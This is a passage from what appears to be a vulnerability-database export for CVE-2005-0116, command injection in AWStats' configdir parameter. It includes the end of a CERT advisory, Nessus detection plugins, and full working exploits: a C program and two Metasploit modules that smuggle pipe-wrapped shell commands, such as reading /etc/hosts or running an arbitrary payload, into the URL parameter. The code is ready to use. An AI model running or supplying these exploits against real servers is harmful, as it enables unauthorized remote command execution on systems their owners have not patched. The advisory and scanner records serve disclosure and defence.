Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://awstats.sourceforge.net/docs/awstats_changelog.txt>\n * [http://www.idefense.com/application/poi/display?id=185&amp;type=vulnerabilities](<http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities>)\n * <http://secunia.com/advisories/13893/>\n\n### Acknowledgements\n\nThis vulnerability was reported by iDEFENSE.\n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2005-0116](<http://web.nvd.nist.gov/vuln/detail/CVE-2005-0116>) \n---|--- \n**Severity Metric:** | 13.39 \n**Date Public:** | 2005-01-18 \n**Date First Published:** | 2005-02-10 \n**Date Last Updated: ** | 2005-02-21 16:39 UTC \n**Document Revision: ** | 44 \n", "modified": "2005-02-21T16:39:00", "published": "2005-02-10T00:00:00", "id": "VU:272296", "href": "https://www.kb.cert.org/vuls/id/272296", "type": "cert", "title": "AWStats fails to properly filter user-supplied input", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T12:49:53", "description": "AWStats configdir Remote Command Execution Exploit (c code). CVE-2005-0116. Webapps exploit for cgi platform", "published": "2005-01-25T00:00:00", "type": "exploitdb", "title": "AWStats 6.0-6.2 configdir Remote Command Execution Exploit c code", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0116"], "modified": "2005-01-25T00:00:00", "id": "EDB-ID:772", "href": "https://www.exploit-db.com/exploits/772/", "sourceData": " /*\r\nAwStats exploit by Thunder, molnar_rcs@yahoo.com\r\n\r\nThis exploit makes use of the remote command execution bug discovered in\r\nAwStats ver 6.2 and below. The bug resides in the awstats.pl perl script.\r\nThe script does not sanitise correctly the user input for the\r\n`configdir` parameter. If the users sends a command prefixed and postfixed\r\nwith | , the command will be executed. An example would be:\r\n\r\nLet's execute '/usr/bin/w':\r\n>\r\nhttp://localhost/cgi-bin/awstats.pl?configdir=%20|%20/usr/bin/w%20|%20\r\n<\r\n\r\nAwstat output:\r\n>\r\nError: LogFile parameter is not defined in config/domain file\r\nSetup (' | /usr/bin/w | /awstats.localhost.conf' file, web server or permissions) may be wrong.\r\nCheck config file, permissions and AWStats documentation (in 'docs' directory).\r\n<\r\n\r\nThat's it. Our command was executed.\r\nThis bug is fixed in AwStats ver 6.3 and a patch was released for all versions, but vulnerable\r\nAwStat is still available for download on several sites (ex. www.topshareware.com).\r\n\r\nType `gcc awexpl.c - o awexpl` to compile the exploit and `./awexpl -u` for usage.\r\n\r\nNote:\r\nJust indexing the commands with | will not always work, or might not work at all. I checked\r\nit on my own awstats 6.0 install, and it failed. So, whoever tried the same on his own\r\nscript and was surprised to see that (although the version he uses is said to be prone to the\r\nremote command execution bug) nothing happened, should patch or upgrade to Awstat 6.3 asap.\r\nAs far as i know all unpached versions prior to 6.3 are vulnerable and commands prefixed and\r\npostfixed by a | character WILL be executed. Beware!\r\n\r\nOh, I almost forgot, the disclaimer :)\r\n\r\nTHIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED \"AS IS\"\r\nAND WITHOUT ANY WARRANTY.\r\n\r\nRobert Molnar,\r\n21th jan 2005\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n//#include <unistd.h>\r\n#include <arpa/inet.h>\r\n#include <string.h>\r\n\r\nvoid usage(char *pname)\r\n{\r\nprintf(\"# AWStats exploit by Thunder, molnar_rcs@yahoo.com\\n\"\r\n\"# Usage: %s -h <host> -i <ip> [-s Script] [-p Path] [-o Port] [-c Commands] [-u]\\n\"\r\n\"\\t-h : target host name, default is `localhost`\\n\"\r\n\"\\t-i : target IP (to wich host name resolvs)\\n\"\r\n\"\\t-s : script name, default is `awstats.pl`\\n\"\r\n\"\\t-p : script path, default is `/cgi-bin`\\n\"\r\n\"\\t-o : specify port to connect to, default is `80`\\n\"\r\n\"\\t-c : specify commands to be executed, the exploit will create a\\n\"\r\n\"\\t : file named `OWNED` in `/tmp` by default\\n\"\r\n\"\\t-u : usage\\n\\n\"\r\n\"# Example: %s -h localhost -i 127.0.0.1\\n\"\r\n\"# : %s -h localhost -i 127.0.0.1 -p /~user/cgi-bin\\n\"\r\n\"# : %s -h localhost -i 127.0.0.1 -p /~user/cgi-bin -c \\\"/usr/bin/id\\\"\\n\"\r\n, pname, pname, pname, pname);\r\n\r\nexit(0);\r\n}\r\n\r\nchar * urlEncode(char *inC)\r\n{\r\nint c, i, j = 0;\r\nchar *h = \"0123456789abcdef\";\r\nchar retval[1024], res[3072];\r\nmemcpy(retval, inC, strlen(inC));\r\nretval[strlen(inC)] = '\\0';\r\nfor(i=0; i < strlen(inC); i++){\r\nc = retval[i];\r\nif( 'a' <= c && c <= 'z'\r\n|| 'A' <= c && c <= 'Z'\r\n|| '0' <= c && c <= '9'\r\n|| c == '-' || c == '_' || c == '.')\r\nres[j++] = c;\r\nelse {\r\nres[j++] = '%';\r\nres[j++] = h[c >> 4];\r\nres[j++] = h[c & 0x0f];\r\n}\r\n}\r\nreturn res;\r\n\r\n}\r\n\r\n\r\nchar *buildHeader(char *Xhost, char *Xpath,char *Xscript, char *exeCmd)\r\n{\r\nchar Header[5196];\r\n\r\nsprintf( Header,\r\n\"GET %s/%s?configdir=%s HTTP/1.1\\r\\n\"\r\n\"Accept: text/xml,application/xml,application/xhtml+xml,\"\r\n\"text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,\"\r\n\"image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\\r\\n\"\r\n\"Accept-Language: en-us\\r\\n\"\r\n\"Accept-Encoding: deflate, gzip\\r\\n\"\r\n\"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)\\r\\n\"\r\n\"Host: %s\\r\\n\"\r\n\"Connection: Keep-Alive\\r\\n\"\r\n\"Cache-Control: no-cache\\r\\n\"\r\n\"\\r\\n\"\r\n, Xpath, Xscript, urlEncode(exeCmd), Xhost );\r\nreturn Header;\r\n}\r\n\r\n\r\nvoid exploit(char *Xhost, char *Xpath,char *Xscript, char *exeCmd, char *Xip, int Xport)\r\n{\r\nint sock, disp = 0, count = 0;\r\nstruct sockaddr_in sockaddrX;\r\nchar *oData, iData;\r\n\r\nprintf(\"# AWStats Exploit by Thunder, molnar_rcs@yahoo.com\\n\");\r\nsockaddrX.sin_port = htons(Xport);\r\nsockaddrX.sin_family = AF_INET;\r\nsockaddrX.sin_addr.s_addr = inet_addr(Xip);\r\nif(Xhost == \"localhost\")\r\n{\r\nprintf(\"# Using hardcoded (default) options, use `-u` for usage\\n\"\r\n);\r\n}\r\nprintf(\"# Connecting to %s (%s) ...\", Xhost, Xip);\r\nsock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\nif (connect(sock, (struct sockaddr*)&sockaddrX, 16) < 0)\r\n{\r\nprintf(\"\\n# Connect to %s (%s) on port %i failed!\\n\", Xhost, Xip, Xport);\r\nexit(-1);\r\n}\r\nprintf(\"Done!\\n# Building header...\");\r\noData = buildHeader(Xhost, Xpath, Xscript, exeCmd);\r\nprintf(\"Done!\\n# Sending data...\");\r\nsend(sock, oData, strlen(oData), 0);\r\n\r\n/* the code below reads the server response byte by byte, this is not needed\r\nwhile(read(sock, &iData, 1))\r\nputchar(iData);\r\n*/\r\nprintf(\"Done!\\n# Exploit finished.\\n\");\r\nclose(sock);\r\n}\r\n\r\n\r\n\r\n\r\n\r\nint main(int argc, char * argv[])\r\n{\r\nextern char *optarg;\r\nextern int optind, optopt;\r\n\r\nint c,\r\nXport = 80,\r\nisgood = 0;\r\n\r\nchar *Xhost = \"localhost\" ,\r\n*Xip = \"127.0.0.1\",\r\n*Xscript = \"awstats.pl\",\r\n*Xpath = \"/cgi-bin\";\r\n\r\nchar exeCmd[1024] = \"| echo \\\"You have been Owned, update AWstat or patch\\\" > /tmp/OWNED | \";\r\n\r\nwhile ((c = getopt(argc, argv, \":uh:i:s:p:c:o:\")) != -1)\r\n{\r\n\r\nswitch(c)\r\n{\r\ncase 'h':\r\nXhost = optarg;\r\nisgood++;\r\nbreak;\r\n\r\ncase 'i':\r\nXip = optarg;\r\nisgood++;\r\nbreak;\r\n\r\ncase 's':\r\nXscript = optarg;\r\nbreak;\r\n\r\ncase 'p':\r\nXpath = optarg;\r\nbreak;\r\n\r\ncase 'c':\r\nif(strlen(optarg) > 1018)\r\n{\r\nprintf(\"# `-c` argument can't exceed 1024 bytes (command to long)\");\r\nexit(0);\r\n}\r\nsprintf(exeCmd, \" | %s | \", optarg);\r\nbreak;\r\n\r\ncase 'o':\r\nXport = atoi(optarg);\r\nbreak;\r\n\r\ncase 'u':\r\nusage(argv[0]);\r\nbreak;\r\n\r\ncase '?':\r\nprintf(\"# Unknown option `-%c`\\n\", optopt);\r\nbreak;\r\n\r\n\r\n}\r\n}\r\n\r\n\r\nif( isgood == 1)\r\n{\r\nprintf(\"# Please specify both host `-h` and ip `-i`\\n\");\r\nexit(0);\r\n}\r\n\r\nexploit(Xhost, Xpath, Xscript, exeCmd, Xip, Xport);\r\nreturn 0;\r\n}\r\n\r\n// milw0rm.com [2005-01-25]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/772/"}, {"lastseen": "2016-02-02T06:47:26", "description": "AWStats configdir Remote Command Execution. CVE-2005-0116. Webapps exploit for cgi platform", "published": "2009-12-26T00:00:00", "type": "exploitdb", "title": "AWStats 6.1-6.2 configdir Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0116"], "modified": "2009-12-26T00:00:00", "id": "EDB-ID:16905", "href": "https://www.exploit-db.com/exploits/16905/", "sourceData": "##\r\n# $Id: awstats_configdir_exec.rb 7970 2009-12-26 03:31:20Z hdm $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'AWStats configdir Remote Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\r\n\t\t\t\t\tAWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2\r\n\t\t\t\t\tare vulnerable.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 7970 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2005-0116'],\r\n\t\t\t\t\t['OSVDB', '13002'],\r\n\t\t\t\t\t['BID', '12298'],\r\n\t\t\t\t\t['URL', 'http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl ruby bash telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'unix',\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' => [[ 'Automatic', { }]],\r\n\t\t\t'DisclosureDate' => 'Jan 15 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('URI', [true, \"The full URI path to awstats.pl\", \"/cgi-bin/awstats.pl\"]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => datastore['URI'],\r\n\t\t\t'vars_get' =>\r\n\t\t\t{\r\n\t\t\t\t'configdir' => '|echo;cat /etc/hosts;echo|'\r\n\t\t\t}\r\n\t\t}, 25)\r\n\r\n\t\tif (res and res.body.match(/localhost/))\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tcommand = Rex::Text.uri_encode(payload.encoded)\r\n\t\turlconfigdir = datastore['URI'] + \"?configdir=|echo;echo%20YYY;#{command};echo%20YYY;echo|\"\r\n\r\n\t\tres = send_request_raw({\r\n\t\t\t'uri' => urlconfigdir,\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'headers' =>\r\n\t\t\t{\r\n\t\t\t\t'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',\r\n\t\t\t\t'Connection' => 'Close',\r\n\t\t\t}\r\n\t\t}, 25)\r\n\r\n\t\tif (res)\r\n\t\t\tprint_status(\"The server returned: #{res.code} #{res.message}\")\r\n\r\n\t\t\tm = res.body.match(/YYY\\n(.*)\\nYYY/m)\r\n\r\n\t\t\tif (m)\r\n\t\t\t\tprint_status(\"Command output from the server:\")\r\n\t\t\t\tprint(\"\\n\" + m[1] + \"\\n\\n\")\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"This server may not be vulnerable\")\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tprint_status(\"No response from the server\")\r\n\t\tend\r\n\tend\r\n\r\nend\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16905/"}, {"lastseen": "2016-02-01T11:30:49", "description": "AWStats 6.2-6.1 configdir Command Injection. CVE-2005-0116. Webapps exploit for cgi platform", "published": "2005-01-15T00:00:00", "type": "exploitdb", "title": "AWStats 6.2-6.1 - configdir Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0116"], "modified": "2005-01-15T00:00:00", "id": "EDB-ID:9912", "href": "https://www.exploit-db.com/exploits/9912/", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'AWStats configdir Remote Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\r\n\t\t\t\t\tAWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2\r\n\t\t\t\t\tare vulnerable.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2005-0116'],\r\n\t\t\t\t\t['OSVDB', '13002'],\r\n\t\t\t\t\t['BID', '12298'],\r\n\t\t\t\t\t['URL', 'http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl ruby bash telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\t\t\r\n\t\t\t'Platform' => 'unix',\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' => [[ 'Automatic', { }]],\r\n\t\t\t'DisclosureDate' => 'Jan 15 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('URI', [true, \"The full URI path to awstats.pl\", \"/cgi-bin/awstats.pl\"]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => datastore['URI'],\r\n\t\t\t'vars_get' =>\r\n\t\t\t{\r\n\t\t\t\t'configdir' => '|echo;cat /etc/hosts;echo|'\r\n\t\t\t}\r\n\t\t}, 25)\r\n\r\n\t\tif (res and res.body.match(/localhost/))\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tcommand = Rex::Text.uri_encode(payload.encoded)\r\n\t\turlconfigdir = datastore['URI'] + \"?configdir=|echo;echo%20YYY;#{command};echo%20YYY;echo|\"\r\n\r\n\t\tres = send_request_raw({\r\n\t\t\t'uri' => urlconfigdir,\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'headers' =>\r\n\t\t\t{\r\n\t\t\t\t'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',\r\n\t\t\t\t'Connection' => 'Close',\r\n\t\t\t}\r\n\t\t}, 25)\r\n\r\n\t\tif (res)\r\n\t\t\tprint_status(\"The server returned: #{res.code} #{res.message}\")\r\n\r\n\t\t\tm = res.body.match(/YYY\\n(.*)\\nYYY/m)\r\n\r\n\t\t\tif (m)\r\n\t\t\t\tprint_status(\"Command output from the server:\")\r\n\t\t\t\tprint(\"\\n\" + m[1] + \"\\n\\n\")\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"This server may not be vulnerable\")\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tprint_status(\"No response from the server\")\r\n\t\tend\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9912/"}], "nessus": [{"lastseen": "2021-01-07T10:39:51", "description": "An iDEFENSE Security Advisory reports :\n\nRemote exploitation of an input validation vulnerability in AWStats\nallows attackers to execute arbitrary commands under the privileges of\nthe web server.\n\nThe problem specifically exists when the application is running as a\nCGI script on a web server. The 'configdir' parameter contains\nunfiltered user-supplied data that is utilized in a call to the Perl\nroutine open()...\n\nSuccessful exploitation allows remote attackers to execute arbitrary\ncommands under the privileges of the web server. This can lead to\nfurther compromise as it provides remote attackers with local access.", "edition": 27, "published": "2005-07-13T00:00:00", "title": "FreeBSD : awstats -- remote command execution vulnerability (0f5a2b4d-694b-11d9-a9e7-0001020eed82)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0116"], "modified": "2005-07-13T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:awstats"], "id": "FREEBSD_PKG_0F5A2B4D694B11D9A9E70001020EED82.NASL", "href": "https://www.tenable.com/plugins/nessus/18840", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18840);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-0116\");\n script_bugtraq_id(12270);\n script_xref(name:\"CERT\", value:\"272296\");\n\n script_name(english:\"FreeBSD : awstats -- remote command execution vulnerability (0f5a2b4d-694b-11d9-a9e7-0001020eed82)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An iDEFENSE Security Advisory reports :\n\nRemote exploitation of an input validation vulnerability in AWStats\nallows attackers to execute arbitrary commands under the privileges of\nthe web server.\n\nThe problem specifically exists when the application is running as a\nCGI script on a web server. The 'configdir' parameter contains\nunfiltered user-supplied data that is utilized in a call to the Perl\nroutine open()...\n\nSuccessful exploitation allows remote attackers to execute arbitrary\ncommands under the privileges of the web server. This can lead to\nfurther compromise as it provides remote attackers with local access.\"\n );\n # http://marc.theaimsgroup.com/?l=full-disclosure&m=110600949323439\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=full-disclosure&m=110600949323439\"\n );\n # http://awstats.sourceforge.net/docs/awstats_changelog.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://awstats.sourceforge.io/docs/awstats_changelog.txt\"\n );\n # http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities&flashstatus=false\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?020e4b8e\"\n );\n # https://vuxml.freebsd.org/freebsd/0f5a2b4d-694b-11d9-a9e7-0001020eed82.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?77ccfd06\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AWStats configdir Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:awstats\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"awstats<6.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T09:25:08", "description": "The remote host is running AWStats, a free logfile analysis tool for\nanalyzing ftp, mail, web, ... traffic. \n\nThe remote version of this software fails to sanitize user-supplied\ninput to the 'configdir' parameter of the 'awstats.pl' script. An\nattacker may exploit this condition to execute commands remotely or\ndisclose contents of files, subject to the privileges under which the\nweb server operates.", "edition": 20, "published": "2005-01-18T00:00:00", "title": "AWStats awstats.pl configdir Parameter Arbitrary Command Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0116"], "modified": "2005-01-18T00:00:00", "cpe": ["cpe:/a:laurent_destailleur:awstats"], "id": "AWSTATS_CONFIGDIR.NASL", "href": "https://www.tenable.com/plugins/nessus/16189", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(16189);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2005-0116\");\n script_bugtraq_id(12270, 12298);\n\n script_name(english:\"AWStats awstats.pl configdir Parameter Arbitrary Command Execution\");\n script_summary(english:\"Determines the presence of AWStats awstats.pl flaws\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a CGI script that allows execution of\narbitrary commands.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running AWStats, a free logfile analysis tool for\nanalyzing ftp, mail, web, ... traffic. \n\nThe remote version of this software fails to sanitize user-supplied\ninput to the 'configdir' parameter of the 'awstats.pl' script. An\nattacker may exploit this condition to execute commands remotely or\ndisclose contents of files, subject to the privileges under which the\nweb server operates.\");\n # http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=185\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2210a10f\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.awstats.org/docs/awstats_changelog.txt\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to AWStats version 6.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AWStats configdir Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/01/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:laurent_destailleur:awstats\");\n script_end_attributes();\n \n script_category(ACT_ATTACK);\n \n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"CGI abuses\");\n \n script_dependencies(\"awstats_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/AWStats\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80, embedded:TRUE);\nif ( ! port ) exit(0, \"Port \"+port+\" is closed\");\nif (get_kb_item(\"Services/www/\"+port+\"/embedded\")) exit(0, \"The web server on port \"+port+\" is embedded.\");\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/AWStats\"));\nif (isnull(install)) exit(0, \"AWStats was not detected on port \"+port);\nmatches = 